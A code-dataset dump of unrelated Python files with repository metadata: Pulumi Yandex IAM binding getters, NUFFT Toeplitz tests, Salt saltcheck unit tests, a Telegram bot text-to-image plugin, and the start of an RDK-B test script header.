def members(self) -> pulumi.Output[Sequence[str]]:
"""
Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
"""
return pulumi.get(self, "members")
@property
@pulumi.getter(name="registryId")
def registry_id(self) -> pulumi.Output[str]:
"""
The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
"""
return pulumi.get(self, "registry_id")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
return pulumi.get(self, "role")
@property
@pulumi.getter(name="sleepAfter")
def sleep_after(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "sleep_after")
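# --- Illustrative usage (sketch, not part of the generated SDK) ---
# Adopting an existing binding with the get() method defined above. Per the
# import note in the docstring, the provider ID is the space-delimited pair
# "<registry_id> <role>"; the registry ID below is a hypothetical placeholder.
#
# existing = ContainerRegistryIamBinding.get(
#     "puller",
#     id="your-registry-id container-registry.images.puller",
# )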
quality signals (for the file above): avg_line_length 47.678873 | max_line_length 180 | alphanum_fraction 0.656268 | 1,947 words | 16,926 chars | 354 lines

hexsha: c78c69e262c3407eb19536171542a6f823373179 | size: 2,822 | ext: py | lang: Python
path: biobb_cmip/test/unitests/test_cmip/test_cmip_docker.py
repo: bioexcel/biobb_cmip @ ee732a67e7e9a7d924ca2c8ec56b69f3e367861a
licenses: ["Apache-2.0"]
stars: null | issues: 9 (2021-05-14T10:10:02.000Z .. 2022-01-19T14:35:20.000Z) | forks: null
from biobb_common.tools import test_fixtures as fx
from biobb_cmip.cmip.cmip import cmip
# class TestCmipMipDocker():
# def setUp(self):
# fx.test_setup(self, 'cmip_mip_docker')
#
# def tearDown(self):
# #pass
# fx.test_teardown(self)
#
# def test_cmip_mip_docker(self):
# cmip(properties=self.properties, **self.paths)
# assert fx.not_empty(self.paths['output_cube_path'])
# assert fx.not_empty(self.paths['output_grd_path'])
# assert fx.equal(self.paths['output_grd_path'], self.paths['ref_output_cmip_mip_grd_path'])
# assert fx.equal(self.paths['output_cube_path'], self.paths['ref_output_cmip_mip_cube_path'])
class TestCmipDockingDocker():
def setUp(self):
fx.test_setup(self, 'cmip_docking_docker')
def tearDown(self):
pass
#fx.test_teardown(self)
def test_cmip_docking_docker(self):
cmip(properties=self.properties, **self.paths)
assert fx.not_empty(self.paths['output_pdb_path'])
assert fx.not_empty(self.paths['output_grd_path'])
assert fx.not_empty(self.paths['output_rst_path'])
# Cannot compare PDB files formed exclusively of HETATM records
#assert fx.equal(self.paths['output_pdb_path'], self.paths['ref_output_cmip_docking_pdb_path'])
# GRD differs between executions
#assert fx.equal(self.paths['output_grd_path'], self.paths['ref_output_cmip_docking_grd_path'])
# RST differs between executions
#assert fx.equal(self.paths['output_rst_path'], self.paths['ref_output_cmip_docking_rst_path'])
# class TestCmipEnergyDocker():
# def setUp(self):
# fx.test_setup(self, 'cmip_energy_docker')
#
# def tearDown(self):
# #pass
# fx.test_teardown(self)
#
# def test_cmip_mip_docker(self):
# cmip(properties=self.properties, **self.paths)
# assert fx.not_empty(self.paths['output_cube_path'])
# assert fx.not_empty(self.paths['output_grd_path'])
# assert fx.equal(self.paths['output_grd_path'], self.paths['ref_output_cmip_mip_grd_path'])
# assert fx.equal(self.paths['output_cube_path'], self.paths['ref_output_cmip_mip_cube_path'])
#
# class TestCmipSolvationDocker():
# def setUp(self):
# fx.test_setup(self, 'cmip_solvation_docker')
#
# def tearDown(self):
# #pass
# fx.test_teardown(self)
#
# def test_cmip_mip_docker(self):
# cmip(properties=self.properties, **self.paths)
# assert fx.not_empty(self.paths['output_cube_path'])
# assert fx.not_empty(self.paths['output_grd_path'])
# assert fx.equal(self.paths['output_grd_path'], self.paths['ref_output_cmip_mip_grd_path'])
# assert fx.equal(self.paths['output_cube_path'], self.paths['ref_output_cmip_mip_cube_path'])
quality signals (for the file above): avg_line_length 40.898551 | max_line_length 103 | alphanum_fraction 0.683203 | 386 words | 2,822 chars | 69 lines

hexsha: 402800afa33e2a04e2fcc498730c7b3655756f4e | size: 5,241 | ext: py | lang: Python
path: tests/test_toeplitz.py
stars repo: zaccharieramzi/torchkbnufft @ 37e5808ab73ddb52cbd4655f3d7fd6273b3dd89a | stars: 1 (2021-04-16T15:41:28.000Z .. 2021-04-16T15:41:28.000Z)
issues/forks repo: edongdongchen/torchkbnufft @ f9ac098c8f122026e8e8866828cb5957118a5679 | issues: null | forks: null
licenses: ["MIT"]
import sys
import numpy as np
import torch
from torchkbnufft import (
AdjKbNufft, AdjMriSenseNufft, KbNufft, MriSenseNufft, ToepNufft,
ToepSenseNufft)
from torchkbnufft.math import inner_product
from torchkbnufft.nufft.toep_functions import calc_toep_kernel
def test_toeplitz_nufft_2d(params_2d, testing_tol, testing_dtype, device_list):
dtype = testing_dtype
# this tolerance looks really bad, but toep struggles with random traj
# for radial it's more like 1e-06
norm_tol = 1e-3
im_size = params_2d['im_size']
numpoints = params_2d['numpoints']
x = params_2d['x']
y = params_2d['y']
ktraj = params_2d['ktraj']
for device in device_list:
x = x.detach().to(dtype=dtype, device=device)
y = y.detach().to(dtype=dtype, device=device)
ktraj = ktraj.detach().to(dtype=dtype, device=device)
kbnufft_ob = KbNufft(
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
adjkbnufft_ob = AdjKbNufft(
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
toep_ob = ToepNufft()
kern = calc_toep_kernel(adjkbnufft_ob, ktraj)
normal_forw = adjkbnufft_ob(kbnufft_ob(x, ktraj), ktraj)
toep_forw = toep_ob(x, kern)
diff = torch.norm(normal_forw - toep_forw) / torch.norm(normal_forw)
assert diff < norm_tol
def test_toeplitz_mrisensenufft_2d(params_2d, testing_tol, testing_dtype, device_list):
dtype = testing_dtype
# this tolerance looks really bad, but toep struggles with random traj
# for radial it's more like 1e-06
norm_tol = 1e-3
im_size = params_2d['im_size']
numpoints = params_2d['numpoints']
x = params_2d['x']
y = params_2d['y']
ktraj = params_2d['ktraj']
smap = params_2d['smap']
for device in device_list:
x = x.detach().to(dtype=dtype, device=device)
y = y.detach().to(dtype=dtype, device=device)
ktraj = ktraj.detach().to(dtype=dtype, device=device)
sensenufft_ob = MriSenseNufft(
smap=smap,
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
adjsensenufft_ob = AdjMriSenseNufft(
smap=smap,
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
toep_ob = ToepSenseNufft(smap=smap).to(dtype=dtype, device=device)
kern = calc_toep_kernel(adjsensenufft_ob, ktraj)
normal_forw = adjsensenufft_ob(sensenufft_ob(x, ktraj), ktraj)
toep_forw = toep_ob(x, kern)
diff = torch.norm(normal_forw - toep_forw) / torch.norm(normal_forw)
assert diff < norm_tol
def test_toeplitz_nufft_3d(params_3d, testing_tol, testing_dtype, device_list):
dtype = testing_dtype
# this tolerance looks really bad, but toep struggles with random traj
# for radial it's more like 1e-06
norm_tol = 1e-1
im_size = params_3d['im_size']
numpoints = params_3d['numpoints']
x = params_3d['x']
y = params_3d['y']
ktraj = params_3d['ktraj']
for device in device_list:
x = x.detach().to(dtype=dtype, device=device)
y = y.detach().to(dtype=dtype, device=device)
ktraj = ktraj.detach().to(dtype=dtype, device=device)
kbnufft_ob = KbNufft(
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
adjkbnufft_ob = AdjKbNufft(
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
toep_ob = ToepNufft()
kern = calc_toep_kernel(adjkbnufft_ob, ktraj)
normal_forw = adjkbnufft_ob(kbnufft_ob(x, ktraj), ktraj)
toep_forw = toep_ob(x, kern)
diff = torch.norm(normal_forw - toep_forw) / torch.norm(normal_forw)
assert diff < norm_tol
def test_toeplitz_mrisensenufft_3d(params_3d, testing_tol, testing_dtype, device_list):
dtype = testing_dtype
# this tolerance looks really bad, but toep struggles with random traj
# for radial it's more like 1e-06
norm_tol = 1e-1
im_size = params_3d['im_size']
numpoints = params_3d['numpoints']
x = params_3d['x']
y = params_3d['y']
ktraj = params_3d['ktraj']
smap = params_3d['smap']
for device in device_list:
x = x.detach().to(dtype=dtype, device=device)
y = y.detach().to(dtype=dtype, device=device)
ktraj = ktraj.detach().to(dtype=dtype, device=device)
sensenufft_ob = MriSenseNufft(
smap=smap,
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
adjsensenufft_ob = AdjMriSenseNufft(
smap=smap,
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
toep_ob = ToepSenseNufft(smap=smap).to(dtype=dtype, device=device)
kern = calc_toep_kernel(adjsensenufft_ob, ktraj)
normal_forw = adjsensenufft_ob(sensenufft_ob(x, ktraj), ktraj)
toep_forw = toep_ob(x, kern)
diff = torch.norm(normal_forw - toep_forw) / torch.norm(normal_forw)
assert diff < norm_tol
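# --- Background sketch (not part of the test suite) ---
# What these tests verify: for a NUFFT A, the normal operator A^H A is
# Toeplitz, so adjnufft_ob(nufft_ob(x)) can be replaced by a single FFT-based
# convolution with a precomputed kernel (calc_toep_kernel above). A minimal
# 1D NumPy illustration of that equivalence, assuming the sign convention
# A[n, j] = exp(-1j * omega_n * j):
def _toeplitz_equivalence_sketch_1d():
    rng = np.random.default_rng(0)
    n = 8
    omega = rng.uniform(-np.pi, np.pi, size=20)       # nonuniform frequencies
    x = rng.standard_normal(n) + 1j * rng.standard_normal(n)

    a = np.exp(-1j * np.outer(omega, np.arange(n)))   # dense NUDFT matrix
    normal = a.conj().T @ (a @ x)                     # adjoint(forward(x))

    m = np.arange(-(n - 1), n)                        # Toeplitz diagonal offsets
    t = np.exp(1j * np.outer(omega, m)).sum(axis=0)   # t[m] = sum_n e^{i w_n m}

    c = np.zeros(2 * n, dtype=complex)                # circulant embedding
    c[:n] = t[n - 1:]                                 # t_0 .. t_{n-1}
    c[n + 1:] = t[:n - 1]                             # t_{-(n-1)} .. t_{-1}
    toep = np.fft.ifft(np.fft.fft(c) * np.fft.fft(x, 2 * n))[:n]

    assert np.allclose(toep, normal)                  # one FFT pass, same result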
quality signals (for the file above): avg_line_length 30.47093 | max_line_length 87 | alphanum_fraction 0.646442 | 694 words | 5,241 chars | 171 lines

hexsha: 407cca5ebe1a37cca51d5a0552fea66a24832ef9 | size: 4,774 | ext: py | lang: Python
path: plugins/prints.py
repo: gorpoorko/Bot-Tcxs-Heroku @ b272b1c491ec2bea14e65f1d4e0c96c23bc2d815
licenses: ["FTL"]
stars: 1 (2020-12-11T10:15:46.000Z) | issues: null | forks: 1 (2021-06-22T19:27:38.000Z)
# -*- coding: utf-8 -*-
#███╗ ███╗ █████╗ ███╗ ██╗██╗ ██████╗ ██████╗ ███╗ ███╗██╗ ██████╗
#████╗ ████║██╔══██╗████╗ ██║██║██╔════╝██╔═══██╗████╗ ████║██║██╔═══██╗
#██╔████╔██║███████║██╔██╗ ██║██║██║ ██║ ██║██╔████╔██║██║██║ ██║
#██║╚██╔╝██║██╔══██║██║╚██╗██║██║██║ ██║ ██║██║╚██╔╝██║██║██║ ██║
#██║ ╚═╝ ██║██║ ██║██║ ╚████║██║╚██████╗╚██████╔╝██║ ╚═╝ ██║██║╚██████╔╝
#╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═════╝
# [+] @GorpoOrko 2020 - Telegram Bot and Personal Assistant [+]
# | TCXS Project Hacker Team - https://tcxsproject.com.br |
# | Telegram: @GorpoOrko Mail:gorpoorko@protonmail.com |
# [+] Github Gorpo Dev: https://github.com/gorpo [+]
import os
from PIL import Image, ImageDraw, ImageFont
from config import bot
async def prints(msg):
if msg.get('text'):
if msg['text'].lower() == 'print' and msg.get('reply_to_message'):
text = msg['reply_to_message']['text']
try:
await bot.sendMessage(msg['chat']['id'], '`Tirando print...`','markdown', reply_to_message_id=msg['message_id'])  # message: "Taking the screenshot..."
img = Image.new('RGBA', (1000, 1000), (255, 255, 255)) # throwaway image, needed only to measure the text size; it is replaced below
draw = ImageDraw.Draw(img)
text_size = draw.textsize(text, ImageFont.truetype("arial.ttf", 30))
# print(text_size)
img2 = Image.new('RGBA', text_size, (255, 255, 255))
draw2 = ImageDraw.Draw(img2)
draw2.text((1, 1), text[0:45], (0, 0, 0), ImageFont.truetype("arial.ttf", 30))
img2.save('arquivos/pil_text.png')
await bot.sendPhoto(msg['chat']['id'],photo=open('arquivos/pil_text.png','rb'), reply_to_message_id=msg['message_id'])
os.remove('arquivos/pil_text.png')
except Exception as e:
await bot.sendMessage(msg['chat']['id'], '`diminua seu texto, tente novamente`', 'markdown',
reply_to_message_id=msg['message_id'])  # message: "shorten your text, try again"
pass
if msg['text'].startswith('/print') or msg['text'].startswith('!print'):
text = msg['text'][6:]
try:
await bot.sendMessage(msg['chat']['id'], '`Tirando print...`','markdown', reply_to_message_id=msg['message_id'])
img = Image.new('RGBA', (1000, 1000), (255, 255, 255)) # throwaway image, needed only to measure the text size; it is replaced below
draw = ImageDraw.Draw(img)
text_size = draw.textsize(text, ImageFont.truetype("arial.ttf", 30))
# print(text_size)
img2 = Image.new('RGBA', text_size, (255, 255, 255))
draw2 = ImageDraw.Draw(img2)
draw2.text((1, 1), text[0:45], (0, 0, 0), ImageFont.truetype("arial.ttf", 30))
img2.save('arquivos/pil_text.png')
await bot.sendPhoto(msg['chat']['id'],photo=open('arquivos/pil_text.png','rb'), reply_to_message_id=msg['message_id'])
os.remove('arquivos/pil_text.png')
except Exception as e:
await bot.sendMessage(msg['chat']['id'], '`diminua seu texto, tente novamente`', 'markdown',
reply_to_message_id=msg['message_id'])
pass
if msg['text'].startswith('print') and not msg.get('reply_to_message'):
text = msg['text'][5:]
try:
await bot.sendMessage(msg['chat']['id'], '`Tirando print...`','markdown', reply_to_message_id=msg['message_id'])
img = Image.new('RGBA', (1000, 1000), (255, 255, 255)) # throwaway image, needed only to measure the text size; it is replaced below
draw = ImageDraw.Draw(img)
text_size = draw.textsize(text, ImageFont.truetype("arial.ttf", 30))
# print(text_size)
img2 = Image.new('RGBA', text_size, (255, 255, 255))
draw2 = ImageDraw.Draw(img2)
draw2.text((2, 1), text[0:45], (0, 0, 0), ImageFont.truetype("arial.ttf", 25))
img2.save('arquivos/pil_text.png')
await bot.sendPhoto(msg['chat']['id'],photo=open('arquivos/pil_text.png','rb'), reply_to_message_id=msg['message_id'])
os.remove('arquivos/pil_text.png')
except Exception as e:
await bot.sendMessage(msg['chat']['id'], '`diminua seu texto, tente novamente`', 'markdown', reply_to_message_id=msg['message_id'])
pass
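# --- Refactoring sketch (hypothetical helper, not used above) ---
# The three branches repeat the same PIL rendering sequence; it could be
# collapsed into one helper along these lines. The name render_text_image
# is illustrative only.
def render_text_image(text, path='arquivos/pil_text.png', font_size=30):
    font = ImageFont.truetype("arial.ttf", font_size)
    # Throwaway canvas, used only to measure the rendered text.
    probe = ImageDraw.Draw(Image.new('RGBA', (1000, 1000), (255, 255, 255)))
    width_height = probe.textsize(text, font)
    # Final canvas sized to the text; the message is truncated to 45 chars,
    # matching the slices above.
    img = Image.new('RGBA', width_height, (255, 255, 255))
    ImageDraw.Draw(img).text((1, 1), text[0:45], (0, 0, 0), font)
    img.save(path)
    return path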
quality signals (for the file above): avg_line_length 58.938272 | max_line_length 176 | alphanum_fraction 0.512987 | 579 words | 4,774 chars | 80 lines

hexsha: 4099cb94ac90bc851b0afada7de57bb9ee34b3dc | size: 17,214 | ext: py | lang: Python
path: tests/unit/modules/test_saltcheck.py
repo: byteskeptical/salt @ 637fe0b04f38b2274191b005d73b3c6707d7f400
licenses: ["Apache-2.0"]
stars: 5 (2018-05-01T20:51:14.000Z .. 2021-11-09T05:43:00.000Z) | issues: 12 (2015-04-15T22:17:42.000Z .. 2016-03-22T08:46:27.000Z) | forks: 7 (2017-09-29T18:49:53.000Z .. 2021-11-09T05:42:49.000Z)
# -*- coding: utf-8 -*-
'''Unit test for saltcheck execution module'''
# Import Python libs
from __future__ import absolute_import, unicode_literals, print_function
import os.path
try:
import salt.modules.saltcheck as saltcheck
import salt.config
import salt.syspaths as syspaths
except:
raise
# Import Salt Testing Libs
try:
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import skipIf, TestCase
from tests.support.mock import (
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON
)
except:
raise
@skipIf(NO_MOCK, NO_MOCK_REASON)
class LinuxSysctlTestCase(TestCase, LoaderModuleMockMixin):
'''
TestCase for salt.modules.saltcheck module
'''
def setup_loader_modules(self):
# Setting the environment to be local
local_opts = salt.config.minion_config(
os.path.join(syspaths.CONFIG_DIR, 'minion'))
local_opts['file_client'] = 'local'
local_opts['conf_file'] = '/etc/salt/minion'
patcher = patch('salt.config.minion_config',
MagicMock(return_value=local_opts))
patcher.start()
self.addCleanup(patcher.stop)
return {saltcheck: {'__opts__': local_opts}}
def test_call_salt_command(self):
'''test simple test.echo module'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'sys.list_modules': MagicMock(return_value=['module1']),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
returned = sc_instance._call_salt_command(fun="test.echo", args=['hello'], kwargs=None)
self.assertEqual(returned, 'hello')
def test_update_master_cache(self):
'''test master cache'''
self.assertTrue(saltcheck.update_master_cache)  # checks the attribute exists; the function itself is not invoked here
def test_call_salt_command2(self):
'''test simple test.echo module again'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'sys.list_modules': MagicMock(return_value=['module1']),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
returned = sc_instance._call_salt_command(fun="test.echo", args=['hello'], kwargs=None)
self.assertNotEqual(returned, 'not-hello')
def test__assert_equal1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = {'a': 1, 'b': 2}
bbb = {'a': 1, 'b': 2}
mybool = sc_instance._SaltCheck__assert_equal(aaa, bbb)
self.assertTrue(mybool)
def test__assert_equal2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_equal(False, True)
self.assertNotEqual(mybool, True)
def test__assert_not_equal1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = {'a': 1, 'b': 2}
bbb = {'a': 1, 'b': 2, 'c': 3}
mybool = sc_instance._SaltCheck__assert_not_equal(aaa, bbb)
self.assertTrue(mybool)
def test__assert_not_equal2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = {'a': 1, 'b': 2}
bbb = {'a': 1, 'b': 2}
mybool = sc_instance._SaltCheck__assert_not_equal(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_true1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_equal(True, True)
self.assertTrue(mybool)
def test__assert_true2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_equal(False, True)
self.assertNotEqual(mybool, True)
def test__assert_false1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_false(False)
self.assertTrue(mybool)
def test__assert_false2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_false(True)
self.assertNotEqual(mybool, True)
def test__assert_in1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = "bob"
mylist = ['alice', 'bob', 'charles', 'dana']
mybool = sc_instance._SaltCheck__assert_in(aaa, mylist)
self.assertTrue(mybool, True)
def test__assert_in2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = "elaine"
mylist = ['alice', 'bob', 'charles', 'dana']
mybool = sc_instance._SaltCheck__assert_in(aaa, mylist)
self.assertNotEqual(mybool, True)
def test__assert_not_in1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = "elaine"
mylist = ['alice', 'bob', 'charles', 'dana']
mybool = sc_instance._SaltCheck__assert_not_in(aaa, mylist)
self.assertTrue(mybool, True)
def test__assert_not_in2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = "bob"
mylist = ['alice', 'bob', 'charles', 'dana']
mybool = sc_instance._SaltCheck__assert_not_in(aaa, mylist)
self.assertNotEqual(mybool, True)
def test__assert_greater1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 110
bbb = 100
mybool = sc_instance._SaltCheck__assert_greater(aaa, bbb)
self.assertTrue(mybool, True)
def test__assert_greater2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 110
mybool = sc_instance._SaltCheck__assert_greater(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_greater3(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 100
mybool = sc_instance._SaltCheck__assert_greater(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_greater_equal1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 110
bbb = 100
mybool = sc_instance._SaltCheck__assert_greater_equal(aaa, bbb)
self.assertTrue(mybool, True)
def test__assert_greater_equal2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 110
mybool = sc_instance._SaltCheck__assert_greater_equal(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_greater_equal3(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 100
mybool = sc_instance._SaltCheck__assert_greater_equal(aaa, bbb)
self.assertEqual(mybool, 'Pass')
def test__assert_less1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 99
bbb = 100
mybool = sc_instance._SaltCheck__assert_less(aaa, bbb)
self.assertTrue(mybool, True)
def test__assert_less2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 110
bbb = 99
mybool = sc_instance._SaltCheck__assert_less(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_less3(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 100
mybool = sc_instance._SaltCheck__assert_less(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_less_equal1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 99
bbb = 100
mybool = sc_instance._SaltCheck__assert_less_equal(aaa, bbb)
self.assertTrue(mybool, True)
def test__assert_less_equal2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 110
bbb = 99
mybool = sc_instance._SaltCheck__assert_less_equal(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_less_equal3(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 100
mybool = sc_instance._SaltCheck__assert_less_equal(aaa, bbb)
self.assertEqual(mybool, 'Pass')
def test__assert_empty(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_empty("")
self.assertEqual(mybool, 'Pass')
def test__assert_empty_fail(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_empty("data")
self.assertNotEqual(mybool, 'Pass')
def test__assert__not_empty(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_not_empty("data")
self.assertEqual(mybool, 'Pass')
def test__assert__not_empty_fail(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_not_empty("")
self.assertNotEqual(mybool, 'Pass')
def test_run_test_1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'sys.list_modules': MagicMock(return_value=['test']),
'sys.list_functions': MagicMock(return_value=['test.echo']),
'cp.cache_master': MagicMock(return_value=[True])}):
returned = saltcheck.run_test(test={"module_and_function": "test.echo",
"assertion": "assertEqual",
"expected-return": "This works!",
"args": ["This works!"]
})
self.assertEqual(returned['status'], 'Pass')
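# --- Note on the sc_instance._SaltCheck__assert_* calls above ---
# Double-underscore attributes are name-mangled by Python to _ClassName__attr,
# which is why these tests reach SaltCheck's private assertion helpers through
# that spelling. A standalone sketch of the mechanism:
#
# class Demo(object):
#     def __hidden(self):
#         return 'Pass'
#
# Demo()._Demo__hidden()   # returns 'Pass'
# Demo().__hidden()        # raises AttributeError outside the class body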
quality signals (for the file above): avg_line_length 46.150134 | max_line_length 105 | alphanum_fraction 0.520274 | 1,584 words | 17,214 chars | 372 lines

hexsha: 40c7e8d4f0b8cbf8e154f811bc4bc61e00ff6777 | size: 38,449 | ext: py | lang: Python
path: testscripts/RDKB/component/RBUS/TS_RBUS_Object_Compare_With_Different_Properties.py
repo: rdkcmf/rdkb-tools-tdkb @ 9f9c3600cd701d5fc90ac86a6394ebd28d49267e
licenses: ["Apache-2.0"]
stars: null | issues: null | forks: null
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2020 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version='1.0' encoding='utf-8'?>
<xml>
<id></id>
<!-- Do not edit id. This will be auto filled while exporting. If you are adding a new script keep the id empty -->
<version>6</version>
<!-- Do not edit version. This will be auto incremented while updating. If you are adding a new script you can keep the version as 1 -->
<name>TS_RBUS_Object_Compare_With_Different_Properties</name>
<!-- If you are adding a new script you can specify the script name. The script name should be unique and match this file name without the .py extension -->
<primitive_test_id> </primitive_test_id>
<!-- Do not change primitive_test_id if you are editing an existing script. -->
<primitive_test_name>RBUS_ObjectCommands</primitive_test_name>
<!-- -->
<primitive_test_version>1</primitive_test_version>
<!-- -->
